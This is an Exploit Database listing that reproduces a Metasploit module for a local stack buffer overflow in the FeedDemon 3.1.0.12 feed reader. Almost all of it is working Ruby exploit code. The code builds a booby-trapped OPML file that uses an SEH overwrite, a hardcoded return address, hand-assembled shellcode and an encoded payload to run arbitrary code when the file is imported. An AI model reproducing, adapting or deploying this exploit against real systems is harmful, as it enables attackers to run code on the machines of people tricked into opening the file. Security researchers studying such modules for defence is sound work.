feedDemon 3.1.0.12 – Local Stack Buffer Overflow (Metasploit)

• Exploit Database
• 145 阅读

• 作者： Metasploit
  日期： 2010-11-11
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/16640/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143

  ## # $Id: feeddemon_opml.rb 10998 2010-11-11 22:43:22Z jduck $ ##   ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ##   require &apos;msf/core&apos;   class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking   include Msf::Exploit::FILEFORMAT include Msf::Exploit::Seh   def initialize(info = {}) super(update_info(info, &apos;Name&apos; => &apos;FeedDemon <= 3.1.0.12 Stack Buffer Overflow&apos;, &apos;Description&apos;=> %q{ This module exploits a buffer overflow in FeedDemon v3.1.0.12. When the application is used to import a specially crafted opml file, a buffer overflow occurs allowing arbitrary code execution.   All versions are suspected to be vulnerable. This vulnerability was originally reported against version 2.7 in February of 2009. }, &apos;License&apos;=> MSF_LICENSE, &apos;Author&apos; => [ &apos;fl0 fl0w&apos;,# Original Exploit &apos;dookie&apos;,# MSF Module &apos;jduck&apos;# SEH + AlphanumMixed fixes ], &apos;Version&apos;=> &apos;$Revision: 10998 $&apos;, &apos;References&apos; => [ [ &apos;CVE&apos;, &apos;2009-0546&apos; ], [ &apos;OSVDB&apos;, &apos;51753&apos; ], [ &apos;BID&apos;, &apos;33630&apos; ], [ &apos;URL&apos;, &apos;http://www.exploit-db.com/exploits/7995&apos; ], [ &apos;URL&apos;, &apos;http://www.exploit-db.com/exploits/8010&apos; ], [ &apos;URL&apos;, &apos;http://www.exploit-db.com/exploits/11379&apos; ] ], &apos;DefaultOptions&apos; => { &apos;EXITFUNC&apos; => &apos;process&apos;, &apos;DisablePayloadHandler&apos; => &apos;true&apos;, }, &apos;Payload&apos;=> { &apos;Space&apos;=> 1024, &apos;BadChars&apos; => "\x0a\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xff", &apos;DisableNops&apos; => true, # We are not strictly limited to alphanumeric. However, currently # no encoder can handle our bad character set. &apos;EncoderType&apos; => Msf::Encoder::Type::AlphanumMixed, &apos;EncoderOptions&apos; => { &apos;BufferRegister&apos; => &apos;ECX&apos;, }, }, &apos;Platform&apos; => &apos;win&apos;, &apos;Targets&apos;=> [ # Tested OK on XPSP3 - jduck [ &apos;Windows Universal&apos;, { &apos;Ret&apos; => 0x00501655 # p/p/r in FeedDemon.exe v3.1.0.12 } ], ], &apos;Privileged&apos; => false, &apos;DisclosureDate&apos; => &apos;Feb 09 2009&apos;, &apos;DefaultTarget&apos;=> 0))   register_options( [ OptString.new(&apos;FILENAME&apos;, [ false, &apos;The file name.&apos;, &apos;msf.opml&apos;]), ], self.class)   end   def exploit   head_opml = &apos;<opml version="1.1">&apos; head_opml << &apos;<body>&apos; head_opml << &apos;<outline text="&apos;   header = "\xff\xfe" # Unicode BOM header << Rex::Text.to_unicode(head_opml)   foot_opml = &apos;">&apos; foot_opml << &apos;<outline text="BKIS" title="SVRT" type="rss" xmlUrl="http://milw0rm.com/rss.php"/>&apos; foot_opml << &apos;</outline>&apos; foot_opml << &apos;</body>&apos; foot_opml << &apos;</opml>&apos; footer = Rex::Text.to_unicode(foot_opml)   # Set ECX to point to the alphamixed encoded buffer (IIIII...) # We use, while avoiding bad chars, an offset from SEH ptr stored on the stack at esp+8 off = 0x1ff2 set_ecx_asm = %Q| mov ecx, [esp+8] sub ecx, #{0x01010101 + off} add ecx, 0x01010101 | set_ecx = Metasm::Shellcode.assemble(Metasm::Ia32.new, set_ecx_asm).encode_string   # Jump back to the payload, after p/p/r jumps to us. # NOTE: Putting the jmp_back after the SEH handler seems to avoid problems with badchars.. # 8 for SEH.Next+SEH.Func, 5 for the jmp_back itself distance = 0x1ffd + 8 + 5 jmp_back = Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string   # SEH seh_frame = generate_seh_record(target.ret)   # Assemble everything together sploit = &apos;&apos; sploit << set_ecx sploit << payload.encoded sploit << rand_text_alphanumeric(8194 - sploit.length) sploit << seh_frame sploit << jmp_back sploit << rand_text_alphanumeric(8318 - sploit.length) # Ensure access violation reading from smashed pointer num = rand_text(4).unpack(&apos;V&apos;)[0] sploit << [num | 0x80000000].pack(&apos;V&apos;)   evil = header + sploit + footer   print_status("Creating &apos;#{datastore[&apos;FILENAME&apos;]}&apos; file ...")   file_create(evil)   end   end